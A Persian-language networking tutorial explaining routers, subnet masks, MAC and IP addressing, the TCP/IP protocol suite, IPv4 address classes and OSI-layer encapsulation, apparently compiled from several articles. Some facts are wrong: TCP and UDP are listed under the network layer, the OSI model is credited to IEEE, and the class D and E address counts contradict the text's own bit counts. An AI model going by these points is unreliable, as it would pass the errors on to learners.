- روترهای بزرگتر نظير روترهائی که يک سازمان کوچک را به اينترنت متصل می نمايند ، عمليات بمراتب بيشتری را نسبت به مدل قبلی انجام می دهند. روترهای فوق از مجموعه قوانين امنيتی حاکم بر سازمان مربوطه تبعيت و بصورت ادواری سيستم امنيتی تبين شده ای را بررسی می نمايند.

- روترهای بزرگتر مشابه روترهائی که ترافيک اطلاعات را در نقط حساس ومهم اينترنت کنترل می نمايند ،  در هر ثانيه ميليون ها بسته اطلاعاتی  را مسيريابی می نمايند.

در اغلب سازمانها و موسسات از روترهای متوسط استفاده می گردد. در اين سازمانها از روتر بمنظور اتصال دو شبکه استفاده می شود. شبکه داخلی سازمان از طريق روتر به شبکه اينترنت متصل می گردد. شبکه داخلی سازمان از طريق يک خط اترنت ( يک اتصال 100base-T 9 ، خط فوق دارای نرخ انتقال  100 مگابيت در ثانيه بوده و از کابل های بهم تابيده هشت رشته استفاده می گردد )  به روتر متصل می گردد. بمنظور ارتباط روتر به مرکز ارائه دهنده خدمات اينترنت (ISP) می توان از خطوط اختصاصی با سرعت های متفاوت استفاده کرد. خط اختصاصی T1 يک نمونه متداول در اين زمينه بوده و دارای سرعت 1.5 مگابيت در ثانيه است . برخی از موسسات با توجه به حساسيت و نوع کار خود می توانند از يک خط ديگر نيز بمنظور ارتباط روتر با ISP استفاده نمايند. خط فوق بصورت Backup بوده و بمحض بروز اشکال در خط اختصاصی ( مثلا" T1 ) می توان از خط دوم استفاده نمود. با توجه به اينکه خط فوق بصورت موقت و در مواقع اضطراری استفاده می شود ، می توان يک خط با سرعت پايين تر را استفاده کرد.

روترها علاوه بر قابليت روتينگ بسته های اطلاعاتی از يک نقطه به نقطه ديگر ، دارای امکانات مربوط به پياده سازی سيستم امنيتی نيز می باشند. مثلا" می توان مشخص کرد که نحوه دستيابی کامپيوترهای خارج از شبکه داخلی سازمان به شبکه داخلی به چه صورت است . اکثر سازمانها و موسسات دارای يک نرم افزار و يا سخت افزار خاص فايروال بمنظور اعمال سياست های امنيتی می باشند. قوانين تعريف شده در جدول پيکربندی روتر از لحاظ امنيتی دارای صلابت بيشتری می باشند.

يکی از عمليات ادواری ( تکراری ) که هر روتر انجام می دهد ، آگاهی از استقرار يک بسته اطلاعاتی در شبکه داخلی است . در صورتيکه بسته اطلاعاتی مربوط به شبکه داخلی بوده نيازی به روت نمودن آن توسط روتر نخواهد بود. بدين منظور از مکانيزمی با نام Subnet mask استفاده می شود. subnet مشابه يک آدرس IP بوده و اغلب بصورت 255.255.255.0 است . آدرس فوق به روتر اعلام می نمايد که تمام پيام های  مربوط به فرستنده و يا گيرنده که دارای يک آدرس مشترک در  سه گروه اول می باشند ، مربوط به يک شبکه مشابه بوده و نيازی به ارسال آنها برای يک شبکه ديگر وجود ندارد. مثلا" کامپيوتری با آدرس 15.57.31.40 پيامی را برای کامپيوتر با آدرس 15.57.31.52 ارسال می دارد. روتر که در جريان تمام بسته های اطلاعاتی است ،  سه گروه اول در آدرس های فرستنده و گيرنده را مطابقت می نمايد و بسته اطلاعاتی را بر روی شبکه داخلی نگه خواهد داشت .

آگاهی از مقصد يک پيام

روتر يکی از مجموعه دستگاههائی است که در شبکه استفاده می شود. هاب ، سوئيچ و روتر سيگنال هائی را ار کامپيوترها و يا شبکه ها دريافت و آنها را برای کامپيوترها و يا شبکه های ديگر ارسال می دارند. روتر تنها دستگاه موجود می باشد که در رابطه با مسير يک بسته اطلاعاتی تصميم گيری می نمايد. بمنظور انجام عمليات فوق ، روترها می بايست نسبت به دو موضوع آگاهی داشته باشند : آدرس ها و ساختار شبکه .

زمانيکه توسط يکی از دوستانتان برای شما يک کارت تبريک سال نو ارسال می گردد ، از آدرسی مطابق زير استفاده می نمايد : " تهران - خيابان ايران - کوچه شميرانات - پلاک 110 " آدرس فوق دارای چندين بخش بوده که به اداره پست مربوطه امکان پيدا نمودن آدرس فوق را خواهد داد.  استفاده از کد پستی  باعث سرعت در ارسال کارت تبريک و دريافت آن توسط شخص مورد نظر می نمايد .ولی حتی در صورتيکه از کد پستی هم استفاده نشود ، امکان دريافت کارت تبريک با توجه به مشخص شدن شهرستان ، خيابان ، کوچه و پلاک نيز وجود خواهد داشت . آدرس فوق يک نوع آدرس منطقی است . آدرس فوق روشی  را برای دريافت کارت تبريک ، مشخص می نمايد. آدرس فوق به يک آدرس فيزيکی مرتبط خواهد شد.

هر يک از دستگاههای موجود که به  شبکه  متصل می گردند ، دارای يک آدرس فيزيکی می باشند. آدرس فوق منحصر بفرد بوده و توسط دستگاهی که به کابل شبکه متصل است ، در نظر گرفته خواهد شد. مثلا" در صورتيکه کامپيوتر شما دارای يک کارت شبکه (NIC) می باشد ، کارت فوق دارای يک آدرس فيزيکی دائمی بوده که در يک محل خاص از حافظه ذخيره شده است . آدرس فيزيکی که آدرس MAC )Media Access Control) نيز ناميده می شود ، دارای دو بخش بوده که هر يک سه بايت می باشند. اولين سه بايت ، شرکت سازنده کارت شبکه را مشخص می نمايد . دومين سه بايت يک شماره سريال مربوط به کارت شبکه است .

کامپيوتر می تواند دارای چندين آدرس منطقی در يک لحظه باشد. وضعيت فوق در رابطه با اشخاص نيز صدق می کند. مثلا" يک شخص می تواند دارای آدرس پستی ، شماره تلفن ، آدرس پست الکترونيکی و ... باشد. از طريق هر  يک از آدرس های فوق امکان ارسال پيام برای شما وجود خواهد داشت .  آدرس های منطقی در کامپيونر نيز مشابه سيستم فوق کار می کنند. در اين راستا ممکن است از مدل های متفاوت آدرس دهی و يا پروتکل های مربوط به شبکه های متفاوت بطور همزمان استفاده گردد. در زمان اتصال به اينترنت ،  شما دارای يک آدرس بوده که از پروتکل TCP/IP مشتق شده است . در صورتيکه دارای يک شبکه کوچک می باشيد ، ممکن است از پروتکل NetBEUI مايکروسافت استفاده می نمائيد. بهرحال يک کامپيوتر می تواند دارای چندين آدرس منطقی بوده که پروتکل استفاده شده قالب آدرس فوق را مشخص خواهد کرد.

آدرس فيزيکی يک کامپيونر می بايست به يک آدرس منطقی تبديل گردد. از آدرس منطقی در شبکه برای ارسال و دريافت اطلاعات استفاده می گردد. برای مشاهده آدرس فيزيکی کامپيوتر خود می توانيد از دستور IPCONFIG ( ويندوز 2000و XP) استفاده نمايد.

پروتکل ها

اولين و مهمترين وظيفه روتر ، آگاهی از محلی است که می بايست اطلاعات ارسال گردند. اکثر روترها که يک پيام را برای شما مسيريابی می نمايند، از آدرس فيزيکی کامپيوتر شما آگاهی ندارند. روترها بمنظور شناخت اکثر پروتکل های رايج ، برنامه ريزی می گردند. بدين ترتيب روترها نسبت به فورمت هر يک از مدل های آدرس دهی دارای شناخت مناسب می باشند. ( تعداد بايت های موجود در هر بسته اطلاعاتی ، آگاهی از نحوه ارسال درست اطلاعات به مقصد و ... )  روترها بعنوان مهمترين عناصر در ايجاد ستون فقرات اينترنت مطرح می باشند. روترها در هر ثانيه ميليون ها بسته اطلاعاتی را مسيريابی می نمايند. ارسال يک بسته اطلاعاتی به مقصد مورد نظر ، تنها وظيفه يک روتر نخواهد بود. روترها می بايست قادر به يافتن بهترين مسير ممکن باشند. دريک شبکه پيشرفته هر پيام الکترونيکی به چندين بخش کوچکتر تقسيم می گردد. بخش های فوق بصورت مجزا ارسال و در مقصد مجددا" با ترکيب بخش های فوق بيکديگر ، پيام اوليه شکل واقعی خود را پيدا خواهد کرد. بخش های اطلاعاتی اشاره شده Packet ناميده شده و هر يک ازآنان می توانند از يک مسير خاص ارسال گردند. اين نوع از شبکه ها را Packet-Switched network می گويند. در شبکه های فوق يک مسير اختصاصی بين کامپيوتر فرستنده بسته های اطلاعاتی و گيرنده  ايجاد نخواهد گرديد. پيام های ارسالی از طريق يکی از هزاران مسير ممکن حرکت تا در نهايت توسط  کامپيوتر گيرنده ، دريافت گردد. با توجه به ترافيک موجود در شبکه ممکن است در برخی حالات عناصر موجود در شبکه  لود بالائی را داشته باشند ، در چنين مواردی روترها با يکديگر ارتباط و ترافيک شبکه را  بهينه خواهند کرد. ( استفاده از مسيرهای ديگر برای ارسال اطلاعات باتوجه به وجود ترافيک بالا در بخش های خاصی از شبکه )

رديابی يک پيام

در صورتيکه از سيستم عامل ويندوز استفاده می نمائيد ، با استفاده از دستور Traceroute می توانيد مسير بسته های اطلاعاتی  را دنبال نمائيد.  مثلا" در صورتيکه بخواهيم از مسير پيوستن به سايت www.microsoft.com آگاهی پيدا نمائيم ، کافی است دستور فوق را بصورت زير تايپ نمائيم :

Tracert www.microsoft.com

خروجی دستور فوق مشابه زير است :

اولين اعداد نشاندهنده تعداد روترموجود بين کامپيوتر شما و سايت مايکروسافت است .  در اين مدل خاص از    روتر استفاده شده است . سه عدد بعدی ، نشاندهنده مدت زمانی است که  اطلاعات از کامپيوتر شما برای روتر ( مشخص شده ) ارسال و مجددا" مراجعت می نمايند. در برخی موارد ممکن است نام روتر نيز اعلام گردد. در نهايت آدرس IP هر يک از روترها نشان داده شده است .بدين ترتيب برای رسيدن به سايت مايکروسافت از محلی که دستور فوق تايپ می گردد ، .... روتر استفاده و    ثانيه زمان برای دريافت اطلاعات از سرويس دهنده و مراجعت مجدد اطلاعات  ، نياز خواهد بود.

ستون فقرات اينترنت

باتوجه به گستردگی اينترنت و وجود ميليون ها بسته اطلاعاتی در هر ثانيه بمنظور مسيريابی ، می بايست از روترهای با سرعت بالا استفاده شود. روتر سری 12000 سيسکو يکی از اين نوع روترها بوده که بعنوان ستون فقرات اصلی در اينترنت استفاده می شود. تکنولوژی بکار گرفته شده در طراحی روترهای فوق مشابه سوپر کامپيوترها می باشد. ( استفاده از پردازنده های با سرعت بالا بهمراه مجموعه ای از سويئچ های پر سرعت ). در روتر مدل 12000 از پردازنده های 200MHZ MIPS R5000  استفاده می شود. 12016 ، يکی از مدل های سری فوق است . مدل فوق قادر دارای توان عمليات  320 ميليارد بيت از اطلاعات را در ثانيه را دارد.   در صورتيکه مدل فوق با تمام توان و ظرفيت خود نصب گردد ، امکان انتقال  60 ميليون بسته اطلاعاتی در هر ثانيه را دارا است .

روترها با استفاده از جدول پيکربندی خود قادر به مسيريابی صحيح بسته های اطلاعاتی خواهند بود. قوانين موجود در جدول فوق سياست مسيريابی يک بسته اطلاعاتی را تبين خواهند کرد . قبل از ارسال بسته های اطلاعاتی توسط  مسير مشخص شده ، روتر خط( مسير ) مربوطه را از از نقطه نظر کارآئی  بررسی می نمايد . در صورتيکه مسير فوق فاقد کارآئی لازم باشد ، روتر مسير فوق را چشم پوشی نموده و مجددا" يک مسير ديگر را مشخص خواهد کرد. پس از اطمينان از کارآئی مسير مشخص شده ، بسته اطلاعاتی توسط مسير مورد نظر ارسال خواهد گرديد. تمام عمليات فوق صرفا" در کسری از ثانيه انجام می گردد. در هر ثانيه، فرآيند فوق ميليون ها مرتبه تکرار خواهد شد.

آگاهی از محلی که پيام ها می بايست ارسال گردند ، مهمترين وظيفه يک روتر است . برخی از روترهای ساده،  صرفا" عمليات فوق را انجام داده و برخی ديگر از روترها عمليات بمراتب بيشتر و پيچيده تری  را انجام می دهند.

TCP/IP پروتکل استاندارد در اکثر شبکه های بزرگ است . با اينکه پروتکل فوق کند و مستلزم استفاده از منابع زيادی است ، ولی بدليل مزايای بالای آن نظير : قابليت روتينگ ، حمايت در اغلب پلات فورم ها و سيستم های عامل همچنان در زمينه استفاده از پروتکل ها حرف اول را می زند. با استفاده از پروتکل فوق کاربران با در اختيار داشتن ويندوز و پس از اتصال به شبکه اينترنت، براحتی قادر به ارتباط با کاربران ديگر خواهند بود که از مکينتاش استفاده می کند
امروزه کمتر محيطی را می توان يافت که نيازبه دانش کافی در رابطه با TCP/IP نباشد. حتی سيستم عامل شبکه ای ناول که ساليان متمادی از پروتکل IPX/SPX برای ارتباطات استفاده می کرد، در نسخه شماره پنج خود به ضرورت استفاده از پروتکل فوق واقف و نسخه اختصاصی خود را در اين زمينه ارائه نمود.
پروتکل TCP/IP در ابتدا برای استفاده در شبکه ARPAnet ( نسخه قبلی اينترنت ) طراحی گرديد. وزارت دفاع امريکا با همکاری برخی از دانشگاهها اقدام به طراحی يک سيستم جهانی نمود که دارای قابليت ها و ظرفيت های متعدد حتی در صورت بروز جنگ هسته ای باشد. پروتکل ارتباطی برای شبکه فوق ، TCP/IP در نظر گرفته شد.
اجزای پروتکل TCP/IP
پروتکل TCP/IP از مجموعه پروتکل های ديگر تشکيل شده که هر يک در لايه مربوطه، وظايف خود را انجام می دهند. پروتکل های موجود در لايه های Transport و Network دارای اهميت بسزائی بوده و در ادامه به بررسی آنها خواهيم پرداخت .

پروتکل های موجود در لايه Network پروتکل TCP/IP

- پروتکل TCP)Transmission Control Protocol) ، مهمترين وظيفه پروتکل فوق اطمينان از صحت ارسال اطلاعات است . پروتکل فوق اصطلاحا" Connection-oriented ناميده می شود. علت اين امر ايجاد يک ارتباط مجازی بين کامپيوترهای فرستنده و گيرنده بعد از ارسال اطلاعات است . پروتکل هائی از اين نوع ، امکانات بيشتری را بمنظور کنترل خطاهای احتمالی در ارسال اطلاعات فراهم نموده ولی بدليل افزايش بار عملياتی سيستم کارائی آنان کاهش خواهد يافت . از پروتکل TCP بعنوان يک پروتکل قابل اطمينان نيز ياد می شود. علت اين امر ارسال اطلاعات و کسب آگاهی لازم از گيرنده اطلاعات بمنظور اطمينان از صحت ارسال توسط فرستنده است . در صورتيکه بسته های اطلاعاتی بدرستی دراختيار فرستنده قرار نگيرند، فرستنده مجددا" اقدام به ارسال اطلاعات می نمايد.

- پروتکل UDP)User Datagram Protocol) . پروتکل فوق نظير پروتکل TCP در لايه " حمل " فعاليت می نمايد. UDP بر خلاف پروتکل TCP بصورت " بدون اتصال " است . بديهی است که سرعت پروتکل فوق نسبت به TCP سريعتر بوده ولی از بعد کنترل خطاء تظمينات لازم را ارائه نخواهد داد. بهترين جايگاه استفاده از پروتکل فوق در مواردی است که برای ارسال و دريافت اطلاعات به يک سطح بالا از اطمينان ، نياز نداشته باشيم .

- پروتکل IP)Internet Protocol) . پروتکل فوق در لايه شبکه ايفای وظيفه کرده و مهمترين مسئوليت آن دريافت و ارسال بسته های اطلاعاتی به مقاصد درست است . پروتکل فوق با استفاده از آدرس های نسبت داده شده منطقی، عمليات روتينگ را انجام خواهد داد.

پروتکل های موجود در لايه Application پروتکل TCP/IP

پروتکل TCP/IP صرفا" به سه پروتکل TCP ، UDP و IP محدود نشده و در سطح لايه Application دارای مجموعه گسترده ای از ساير پروتکل ها است . پروتکل های فوق بعنوان مجموعه ابزارهائی برای مشاهده ، اشکال زدائی و اخذ اطلاعات و ساير عمليات مورد استفاده قرار می گيرند.در اين بخش به معرفی برخی از اين پروتکل ها خواهيم پرداخت .

- پروتکل FTP)File Transfer Protocol) . از پروتکل فوق برای تکثير فايل های موجود بر روی يک کاميپيوتر و کامپيوتر ديگر استفاده می گردد. ويندوز دارای يک برنامه خط دستوری بوده که بعنوان سرويس گيرنده ايفای وظيفه کرده و امکان ارسال و يا دريافت فايل ها را از يک سرويس دهنده FTP فراهم می کند.

- پروتکل SNMP)Simple Network Management Protocol) . از پروتکل فوق بمنظور اخذ اطلاعات آماری استفاده می گردد. يک سيستم مديريتی، درخواست خود را از يک آژانس SNMP مطرح و ماحصل عمليات کار در يک MIB)Management Information Base) ذخيره می گردد. MIB يک بانک اطلاعاتی بوده که اطلاعات مربوط به کامپيوترهای موجود در شبکه را در خود نگهداری می نمايد .( مثلا" چه ميزان فضا ی هارد ديسک وجود دارد)

- پروتکل TelNet . با استفاده از پروتکل فوق کاربران قادر به log on ، اجرای برنامه ها و مشاهده فايل های موجود بر روی يک کامپيوتر از راه دور می باشند. ويندوز دارای برنامه های سرويس دهنده و گيرنده جهت فعال نمودن و استفاده از پتانسيل فوق است .

- پروتکل SMTP)simple Mail Transfer Protocol) . از پروتکل فوق برای ارسال پيام الکترونيکی استفاده می گردد.

- پروتکل HTTP)HyperText Transfer Protocol) . پروتکل فوق مشهورترين پروتکل در اين گروه بوده و از آن برای رايج ترين سرويس اينترنت يعنی وب استفاده می گردد. با استفاده از پروتکل فوق کامپيوترها قادر به مبادله فايل ها با فرمت های متفاوت ( متن، تصاوير ،گرافيکی ، صدا، ويدئو و...) خواهند بود. برای مبادله اطلاعات با استناد به پروتکل فوق می بايست ، سرويس فوق از طريق نصب سرويس دهنده وب فعال و در ادامه کاربران و استفاده کنندگان با استفاده از يک مرورگر وب قادر به استفاده از سرويس فوق خواهند بود.

پروتکل NNTP)Network News Transfer Protocol) . از پروتکل فوق برای مديريت پيام های ارسالی برای گروه های خبری خصوصی و عمومی استفاده می گردد. برای عملياتی نمودن سرويس فوق می بايست سرويس دهنده NNTP بمنظور مديريت محل ذخيره سازی پيام های ارسالی نصب و در ادامه کاربران و سرويس گيرندگان با استفاده از برنامه ای موسوم به NewsReader از اطلاعات ذخيره شده استفاده خواهند کرد

مدل آدرس دهی IP
علاوه بر جايگاه پروتکل ها، يکی ديگر از عناصر مهم در زيرساخت شبکه های مبتنی بر TCP/IP مدل آدرس دهی IP است . مدل انتخابی می بايست اين اطمينان را بوجود آورد که اطلاعات ارسالی بدرستی به مقصد خواهند رسيد. نسخه شماره چهار IP ( نسخه فعلی ) از 32 بيت برای آدرس دهی استفاده کرده که بمنظور تسهيل در امر نمايش بصورت چهار عدد صحيح ( مبنای ده ) که بين آنها نقطه استفاده شده است نمايش داده می شوند.

نحوه اختصاص IP
نحوه اختصاص IP به عناصر مورد نياز در شبکه های مبتنی بر TCP/IP يکی از موارد بسيار مهم است . اختصاص IP ممکن است بصورت دستی و توسط مديريت شبکه انجام شده و يا انجام رسالت فوق بر عهده عناصر سرويس دهنده نرم افزاری نظير DHCP و يا NAT گذاشته گردد

Subnetting
يکی از مهمترين عمليات در رابطه با اختصاص IP مسئله Subnetting است . مسئله فوق بعنوان هنر و علمی است که ماحصل آن تقسيم يک شبکه به مجموعه ای از شبکه های کوچکتر (Subnet) از طريق بخدمت گرفتن ۳۲ بيت با نام Subnet mask بوده که بنوعی مشخصه (ID) شبکه را مشخص خواهد کرد.

کالبد شکافی آدرس های IP

هر دستگاه در شبکه های مبتنی بر TCP/IP دارای يک آدرس منحصر بفرد است . آدرس فوق IP ناميده می شود. يک آدرس IP مطابق زير است :

• § 216.27.61.137

بمنظور بخاطر سپردن آسان آدرس های IP ، نحوه نما يش آنها بصورت دسيمال ( مبنای دهدهی ) بوده که توسط چهار عدد که توسط نقطه از يکديگر جدا می گردند ، است . هر يک از اعداد فوق را octet می گويند. کامپيوترها برای ارتباط با يکديگر از مبنای دو ( باينری ) استفاده می نمايند. فرمت باينری آدرس IP اشاره شده بصورت زير است :

• § 11011000.00011011.00111101.10001001

همانگونه که مشاهده می گردد ، هر IP از 32 بيت تشکيل می گردد. بدين ترتيب می توان حداکثر 4.294.967.296 آدرس منحصر بفرد را استفاده کرد( 2³² ) . مثلا" آدرس 255.255.255.255 برای Broadcast ( انتشار عام ) استفاده می گردد . نمايش يک IP بصورت چهار عدد ( Octet) صرفا" برای راحتی کار نبوده و از آنان برای ايجاد " کلاس های IP " نيز استفاده می گردد. هر Octet به دو بخش مجزا تقسيم می گردد: شبکه (Net) و ميزبان (Host) . اولين octet نشاندهنده شبکه بوده و از آن برای مشخص نمودن شبکه ای که کامپيوتر به آن تعلق دارد ، استفاده می گردد. سه بخش ديگر octet ، نشاندهنده آدرس کامپيوتر موجود در شبکه است

پنج کلاس متفاوت IP بهمراه برخی آدرس های خاص ، تعريف شده است :

- Default Network . آدرس IP 0.0.0.0 ، برای شبکه پيش فرض در نظر گرفته شده است .آدرس فوق برای موارديکه کامپيوتر ميزبان از آدرس خود آگاهی ندارد استفاده شده تا به پروتکل هائی نظير DHCP اعلام نمايد برای وی آدرسی را تخصيص دهد.

- کلاس A . کلاس فوق برای شبکه های بسيار بزرگ نظير يک شرکت بين المللی در نظر گرفته می شود. آدرس هائی که اولين octet آنها 1 تا 126 باشد ، کلاس A می باشند. از سه octet ديگر بمنظور مشخص نمودن هر يک از کامپيوترهای ميزبان استفاده می گردد. بدين ترتيب مجموع شبکه های کلاس A ، معادل 126 و هر يک از شبکه های فوق می توانند 16.777.214 کامپيوتر ميزبان داشته باشند. ( عدد فوق از طريق حاصل 2 - 2²⁴ بدست آمده است ) .بنابراين تعداد تمام کامپيوترهای ميزبان در شبکه های کلاس A معادل 2.147.483.648 (2³¹) است . در شبکه های کلاس A ، بيت با ارزس بالا در اولين octet همواره مقدار صفر را دارد.

- LoopBack . آدرس IP 127.0.0.1 برای LoopBack در نظر گرفته شده است . کامپيوتر ميزبان از آدرس فوق برای ارسال يک پيام برای خود استفاده می کند.( فرستنده و گيرنده پيام يک کامپيوتر می باشد) آدرس فوق اغلب برای تست و اشکال زدائی استفاده می گردد.

- کلاس B . کلاس فوق برای شبکه های متوسط در نظر گرفته می شود.( مثلا" يک دانشگاه بزرگ ) آدرس هائی که اولين octet آنها 128 تا 191 باشد ، کلاس B می باشند. در کلاس فوق از دومين octet هم برای مشخص کردن شبکه استفاده می گردد. از دو octet ديگر برای مشخص نمودن هر يک از کامپيوترهای ميزبان در شبکه استفاده می گردد بدين ترتيب 16.384 ( 2¹⁴) شبکه از نوع کلاس B وجود دارد. تعداد کامپيوترهای ميزبان در اين نوع شبکه ها( هر شبکه ) معادل 65.534 (2 - ¹⁶ 2 ) است . بنابراين تعداد تمام کامپيوترهای ميزبان در شبکه های کلاس B معادل 1.073.741.824 (2³⁰) است در شبکه های کلاس B ، اولين و دومين بيت در اولين octet به ترتيب مقدار يک و صفر را دارا می باشند.

- کلاس C . کلاس فوق برای شبکه های کوچک تا متوسط در نظر گرفته می شود.آدرس هائی که اولين octet آنها 192 تا 223 باشد ، کلاس C می باشند. در کلاس فوق از دومين و سومين octet هم برای مشخص کردن شبکه استفاده می گردد. از آخرين octet برای مشخص نمودن هر يک از کامپيوترهای ميزبان در شبکه استفاده می گردد . بدين ترتيب 2.097.152 ( ²¹ 2 ) شبکه کلاس C وجود دارد.تعداد کامپيوترهای ميزبان در اين نوع شبکه ها( هر شبکه ) معادل 254 (2 - ⁸ 2 ) است . بنابراين تعداد تمام کامپيوترهای ميزبان در شبکه های کلاس C معادل 536.870.912 ( 2²⁹ ) است . در شبکه های کلاس C ، اولين ، دومين و سومين بيت در اولين octet به ترتيب مقدار يک ، يک و صفر را دارا می باشند.

- کلاس D . از کلاس فوق برای multicasts استفاده می شود. در چنين حالتی يک گره ( ميزبان) بسته اطلاعاتی خود را برای يک گروه خاص ارسال می دارد. تمام دستگاه های موجود در گروه ، بسته اطلاعاتی ارسال شده را دريافت خواهند کرد. ( مثلا" يک روتر سيسکو آخرين وضعيت بهنگام شده خود را برای ساير روترهای سيسکو ارسال می دارد ) کلاس فوق نسبت به سه کلاس قبلی دارای ساختاری کاملا" متفاوت است. اولين ، دومين ، سومين و چهارمين بيت به ترتيب دارای مقادير يک ، يک ، يک و صفر می باشند.28 بيت باقيمانده بمنظور مشخص نمودن گروههائی از کامپيوتر بوده که پيام Multicast برای آنان در نظر گرفته می شود. کلاس فوق قادر به آدرسی دهی 268.435.456 (2²⁶ ) کامپيوتر است

- کلاس E . از کلاس فوق برای موارد تجربی استفاده می شود. کلاس فوق نسبت به سه کلاس اوليه دارای ساختاری متفاوت است . اولين ، دومين ، سومين و چهارمين بيت به ترتيب دارای مقادير يک ، يک ، يک و يک می باشند.28 بيت باقيمانده بمنظور مشخص نمودن گروههائی از کامپيوتر بوده که پيام Multicast برای آنان در نظر گرفته می شود. کلاس فوق قادر به آدرسی دهی 268.435.456 (2²⁶ ) کامپيوتر است

- BroadCast . پيام هائی با آدرسی از اين نوع ، برای تمامی کامپيوترهای در شبکه ارسال خواهد شد. اين نوع پيام ها همواره دارای آدرس زير خواهند بود :

• § 255.255.255.255.

- آدرس های رزو شده . آدرس های IP زير بمنظور استفاده در شبکه های خصوصی (اينترانت ) رزو شده اند :

• § 10.x.x.x
• § 172.16.x.x - 172.31.x.x
• § 192.168.x.x

- IP نسخه شش . نسخه فوق برخلاف نسخه فعلی که از 32 بيت بمنظور آدرس دهی استفاده می نمايد ، از 128 بيت برای آدرس دهی استفاده می کند. هر شانزده بيت بصورت مبنای شانزده نمايش داده می شود. :

خلاصه :

آيا تاکنون برای شما  اين سوال مطرح شده است که نحوه مبادله اطلاعات بين دو کامپيوتر موجود در يک شبکه به چه صورت است ؟  همانگونه که در مطلب "آشنائی با مدل مرجع OSI " اشاره گرديد ، کامپيوترهای موجود در يک شبکه به منظور مبادله اطلاعات تابع مدل مرجع OSI می باشند . مدل فوق، همانند يک دستورالعمل اجرائی بوده و عمليات لازم در زمان ارسال و يا دريافت داده را برای يک کامپيوتر مشخص می نمايد . به منظور آشنائی و آناليز فرآيند مبادله داده بين دو کامپيوتر موجود در يک شبکه  به بررسی يک نمونه مثال کاربردی خواهيم پرداخت .
زمانی که يک اتومبيل در کارخانه ای توليد می گردد ، يک نفر تمامی کارها را انجام نخواهد داد . توليد يک اتومبيل بر اساس يک خط توليد انجام شده و همزمان با حرکت اتومبيل در خط توليد هر شخص بخش های متفاوتی را به آن اضافه نموده  و زمانی که به انتهای خط توليد می رسيم ، اتومبيل مورد نظر توليد و آماده استفاده خواهد بود .
وضعيت فوق در رابطه با داده ارسالی از يک کامپيوتر به کامپيوتر ديگر نيز صدق می کند . مدل OSI که توسط کميته IEEE ايجاد شده است، قوانين لازم  به منظور مبادله اطلاعات بين کامپيوترها را فراهم می نمايد . بدين ترتيب و با پيروی از مجموعه رهنمودهای ارائه شده در مدل مرجع OSI ، هر کامپيوتر قادر به مبادله اطلاعات با ساير کامپيوترها ( صرفنظر از نوع کامپيوتر ) خواهد بود . حرکت داده با دو روش متفاوت در مدل مرجع OSI انجام می شود . در سمت فرستنده ( به طرف پائين ) ، داده ها کپسوله شده و برای کامپيوتر گيرنده ارسال می شوند . در سمت گيرنده ( به طرف بالا ) ، داده ها از حالت کپسوله خارج شده و در  نهايت در اختيار کامپيوتر گيرنده قرار داده می شوند.

ارسال داده  : شکل زير  نحوه ارسال داده توسط يک کامپيوتر را نشان می دهد :

توضيحات :

• کامپيوتر موجود در شبکه ، قصد ارسال داده برای کامپيوتر ديگر را دارد . در لايه Application ، رابط کاربر وجود داشته و از طريق آن کاربر با برنامه مورد نظر ارتباط برقرار می نمايد .
• پس از ارسال داده از لايه Application ، داده ارسالی به ترتيب لايه های Presentation و Session را طی می نمايد . هر يک از لايه های فوق اطلاعات اضافه ای را به داده اوليه اضافه نموده و در نهايت داده در اختيار لايه Transport قرار داده می شود .
• در لايه Transport ، داده به بخش های کوچکتری تقسيم و هدر TCP به آن اضافه می گردد . به داده موجود در لايه Transport ، "سگمنت" گفته می شود . هر سگمنت شماره گذاری شده تا امکان بازسازی مجدد آنان در مقصد وجود داشته باشد ( انتظار داريم داده دريافتی توسط گيرنده همان داده ارسالی توسط فرستنده باشد ) .
• هر سگمنت در ادامه به منظور آدرس دهی شبکه ( منظور آدرس دهی منطقی است ) و روتينگ مناسب در اختيار لايه Network قرار داده می شود . به داده موجود در لايه Network ، بسته اطلاعاتی و يا Packet گفته می شود . لايه Network ، هدر IP خود را به آن اضافه نموده و آن را برای لايه DataLink ارسال می نمايد .
• در لايه DataLink به داده ئی که هم اينک شامل هدر لايه های Transport و Network است ، "فريم" گفته می شود . در اين لايه ، هر يک از بسته های اطلاعاتی دريافتی، کپسوله شده و در يک فريم به همراه آدرس سخت افزاری ( آدرس MAC ) کامپيوترهای فرستنده و گيرنده سازماندهی می شوند . در فريم فوق اطلاعات مربوط به LLC ( نوع پروتکل ارسالی توسط لايه قبلی زمانی که به کامپيوتر مقصد می رسد )، نيز اضافه می شود . در بخش انتهائی فريم ، فيلدی با نام FCS که از کلمات Frame Check Sequence اقتباس شده است به منظور بررسی خطاء اضافه می گردد .
• در صورتی که کامپيوتر مقصد بر روی يک کامپيوتر از راه دور باشد ، فريم به روتر و يا gateway به منظور مسيريابی مناسب ارسال می گردد .
• به منظور استقرار فريم بر روی شبکه می بايست اطلاعات موجود به صورت سيگنال های ديجيتال تبديل شوند . با توجه به اين که يک فريم مشتمل بر مجموعه ای از صفر و يک است ، لايه Physical عمليات کپسوله نمودن ارقام موجود در فريم به يک سيگنال ديجيتال را انجام خواهد داد .
• در ابتدای فريم و به منظور انجام عمليات همزمان سازی ( هماهنگ شدن دريافت کننده با فرستنده ) ، تعداد اندکی صفر و يک اضافه می گردد .

دريافت داده : شکل زير نحوه دريافت داده توسط يک کامپيوتر  را نشان می دهد :

توضيحات :

• کامپيوتر دريافت کننده در ابتدا به منظور هماهنگ کردن خود با کامپيوتر فرستنده در جهت خواندن سيگنال ديجيتال، تعداد محدودی از بيت ها را می خواند . پس از اتمام عمليات همزمان سازی و دريافت تمامی فريم آن را به لايه بالاتر ( لايه DataLink )، ارسال می نمايد .
• لايه DataLink ، در ابتدا بررسی لازم در رابطه با وجود خطاء ( CRC ) و يا همان Cyclic Redundancy Check را در خصوص اطلاعات دريافتی انجام خواهد داد . محاسبات فوق توسط کامپيوتر دريافت کننده انجام شده و ماحصل کار با مقدار موجود در فيلد FCS مقايسه شده و بر اساس آن تشخيص داده خواهد شد که آيا فريم دريافتی بدون بروز خطاء دريافت شده است ؟ در ادامه لايه DataLink ، اطلاعات اضافه و يا هدری را که توسط لايه DataLink کامپيوتر از راه دور به آن اضافه شده است را برداشته و مابقی داده را که به آن Packet اطلاق می گردد برای لايه Network ارسال می نمايد .
